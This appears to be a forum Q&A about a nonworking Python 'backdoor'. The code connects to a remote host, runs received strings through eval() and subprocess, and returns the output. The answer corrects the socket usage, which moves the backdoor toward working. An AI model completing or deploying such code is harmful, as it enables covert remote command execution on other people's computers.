# Put into a variable the result of listen a TCP port

Tags: python, sockets, tcp, ports

I was making an experimental backdoor that needs to put into a variable the string that I will send to the port number 433. I try this, but it doesn't work. Here's the code:

```
 import socket
 import time
 import subprocess

 host = ''  # <-- WRITE HERE THE HOST TO RECIVE INFO
 port = '433'
 s = socket.socket()
 s.accept()
 my_ip = socket.gethostbyname(socket.gethostname())
 s.bind((host, port))
 try:
     s.connect()
 except socket.error():
     time.sleep(5)
     s.connect()
 s.send("\n[*] Status: Conected!")
 s.listen(port)
 while 1:
     time.sleep(2)
     s.send("\n[*] Status: Transmiting from " + str(my_ip) + "...")
     s.send("\n[*] Status: Listening port " + str(port) + "...")
     rmt_cmd = s.recv(1024)
     if rmt_cmd != "":
         eval(rmt_cmd)
         s.send("\n[*] Status: Executing ( " + str(rmt_cmd) + " )...")
         process = subprocess.Popen(rmt_cmd, shell=False,
         stdout=subprocess.PIPE, stderr=subprocess.PIPE,       stdin=subprocess.PIPE)
         cmd_output = process.stdout.read() + process.stderr.read()
         s.send("\n[*] Command output/error(s):")
         s.send("\n[*] " + cmd_output)
     else:
         s.send("\n[*] No command recived")
         s.send("\n[*] Status: Listening port " + str(port) + "...")
```

Here the code try to connect to the host, and if there is an error, it waits 5 second and try again, because the other computer has an program that initiate with the OS that accept the connections, so the backdoor wait 5 seconds because the computer may be turning on:

```
 try:
         s.connect()
     except socket.error():
         time.sleep(5)
         s.connect()
```

but the problem is that I want to put into rmt_cmd (remote_command) the string that I will send to the port 433, and this give me another thing:

```
rmt_cmd = s.recv(1024)
```

How can I do it?

Comment: I don't understand, what error are you getting?

Comment: you'd need to run this as root. unix systems require root privs to bind to ports <= 1024.

Comment: @tglaria I will send a string to the port 433, and I need to save that string into rmt_cmd

Comment: @Behind7Proxies and "What error are you getting"?

Comment: @tglaria I'm not getting an error, I'm getting an empty string (''), and I want to get what I will send to that port

Comment: The receive part of the code doesn't look wrong. Have you tried with a smaller code? A simple client/server app?

Comment: Also, as @MarcB said, try as root if you're under linux.

Comment: @tglaria I'm not on Linux, I'm on Windows, and writting in the NINJA-IDE, but I'll try what you said of the client/server app, thanks =)

Comment: @tglaria Recien cuando me meti en tu perfil vi que hablas espanol, hubiera sido mucho mas facil la comunicacion =)

Comment: @Behind7Proxies, since this is an english ¿forum? the idea is that all communication is made in english. For chat, yes, it could be in spanish.

Answer (score 1):

Although I understand what you're trying to do, the way you're trying to achieve this needs to be reworked.

```
s = socket.socket()
s.accept()
my_ip = socket.gethostbyname(socket.gethostname())
s.bind((host, port))
try:
    s.connect()
except socket.error():
    time.sleep(5)
    s.connect()
s.send("\n[*] Status: Conected!")
s.listen(port)
```

You need to get understanding of what you actually want.

1) Do you want your backdoor to stay passive and wait for a connection? Then it should be like this:

```
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.bind(address)  # your host/port pair that client will need to connect to
sock.listen(5)
client_sock = sock.accept()  # all the communications happen with 
                             # client_sock since now
```

In this case it is also possible that your OS won't let you bind 433 port. Ports below 1024 are usually forbidden to use by third party apps to prevent conflicts and backdoors (ha-ha).

2) Do you want your backdoor to actively connect to the remote host? Just create socket and use its `connect` method. Don't mix `bind+listen+accept` (passive socket mode) with `connect` (active mode).

`rmt_cmd = s.recv(1024)` part [is unreliable and needs to be refactored](http://blog.stephencleary.com/2009/04/message-framing.html). The same thing with `s.send` usages. Use `s.sendall` instead or there's a change you won't send the whole message in one `send`.